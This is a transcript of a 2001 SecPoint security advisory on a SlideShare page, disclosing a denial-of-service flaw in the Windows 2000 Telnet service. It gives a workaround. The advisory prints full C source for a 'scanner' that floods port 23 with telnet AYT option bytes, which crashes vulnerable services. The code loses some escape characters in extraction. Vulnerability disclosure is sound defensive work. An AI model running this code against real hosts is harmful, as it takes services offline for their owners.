secpoint it security advisory 3

  • 247 views
Uploaded on

http://www.secpoint.com secpoint it security advisory 3

http://www.secpoint.com secpoint it security advisory 3

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
247
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
0
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. SecPoint(R) info@secpoint.com http://www.secpoint.com/Advisory #003Title: Vulnerability in Windows 2000 TELNET service.Date: 25-07-01 Copyright (c) 2001 SecPoint(R)Contents:========= I Disclaimer II Introduction III Description IV Demonstration code V Fix VI Contact VII SecPoint(R) Scanner VIII GreetingsI - Disclaimer:===============This paper is for educational purpose only, SecPoint(R) will not beresponsible for any damages whatsoever that have a connection with theinformation written in this paper. There are no warranties with regardto this information, any use of this information is at the users own risk.II - Introduction:==================After coding a vulnerability scanner for the security hole in most telnetdaemons under UNIX it was found that the Windows 2000 Telnet service to bevulnerable to a Denial of Service attack.This was tested against a Windows 2000 Service Pack 2 and all single patchesapplied.III - Description:==================This utility is meant to scan for the AYT vulnerability in telnet daemonsbuild upon the BSD source.IV - Demonstration code=======================/* * Telnetd AYT overflow scanner, by SecPoint(R) * Bug found by scut of TESO Security * * Date: 25/07/01 * Author: SecPoint(R) * WWW: http://www.secpoint.com * Email: info@secpoint.com * * This program checks for the AYT overflow related to the
  • 2. * newly discovered telnetd vulnerabilities. * * Tested against: * Vulnerable: * netkit-telnet-0.10 * FreeBSD 4.2 * Windows 2000 Service Pack2 Telnet service will * crash when scanned. * Not vulnerable: * netkit-telnet-0.17 * * * * Please keep us updated with the OSs that you check, and * report back to us on info@secpoint.com, weather the system * is vulnerable or not. So we can construct a full list * of vulnerable systems. * * * This source code is for educational purpose ONLY, * SecPoint(R) will not be responsible for any damages * whatsoever that have a connection with this code. There are * no warranties with regard to this information. * * Are your networks under attack at this moment? * * With SecPoint(R) Scanner you can find and repair the * Vulnerabilities before the bad guys get in. * * Please see http://www.secpoint.com/solutions.php * */#include <stdio.h>#include <stdlib.h>#include <netinet/in.h>#include <netdb.h>#include <string.h>#include <sys/socket.h>#include <signal.h>#include <unistd.h>struct in_addr addr;struct sockaddr_in address;struct hostent *host;int sock;char sendbuffer[5120];char buffer[5120*2];int i;void handle_alarm(int signum) { alarm(0);}int main (int argc, char *argv[]) { printf("Telnetd AYT overflow checker, by SECPointn"); if (argc!=2) { printf("Usage: %s <host>n", argv[0]);
  • 3. exit(EXIT_FAILURE); } printf("Host: %sn", argv[1]); if ((host=gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(0); exit(EXIT_FAILURE); } if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) { perror("socket"); exit(EXIT_FAILURE); } bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length); address.sin_family=AF_INET; address.sin_port = htons(23); // telnet if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) { perror("connect"); exit(EXIT_FAILURE); } printf("Connected to remote host...n"); printf("Sending telnet options... stand by...n"); signal(SIGALRM,handle_alarm); bzero(sendbuffer,sizeof(sendbuffer)); for (i=0;i<sizeof(sendbuffer);i++) { sendbuffer[i]=(i%2) ? xf6 : xff; } alarm(60); read(sock, buffer, sizeof(buffer)); alarm(0); write(sock, sendbuffer, strlen(sendbuffer)); bzero(buffer,sizeof(buffer)); alarm(60); if (read(sock, buffer, sizeof(buffer)) <=0) { printf("Telnetd on %s vulnerablen",argv[1]); exit(EXIT_SUCCESS); } alarm(0); printf("Telnetd on %s not vulnerablen",argv[1]); exit(EXIT_SUCCESS);}V - Fix:========Temporary solution:Disable telnet service.Do the following:Start->Control-Panel->Administrative-Utils->ServicesFind the telnet service and select disableMicrosoft has been notified on this issue and we are awaiting patchinformation.
  • 4. VI - Contact:=============If you have further questions regarding this bug, then you can contact us atwww.secpoint.cominfo@secpoint.comVII - SecPoint(R) Scanner:=================Are your networks under attack at this moment?With SecPoint(R) Scanner you can find and repair the vulnerabilitiesbefore the bad guys get in.One of the worlds most powerful security scanner, with more than 3000 checks.A useable solution for each found vulnerability.Scans: Firewalls, routers, UNIX, Windows...User-friendly interface that presents professional reports in PDF format!VIII - Greetings:=================: el8,cr,superluck,s1,cybk0red.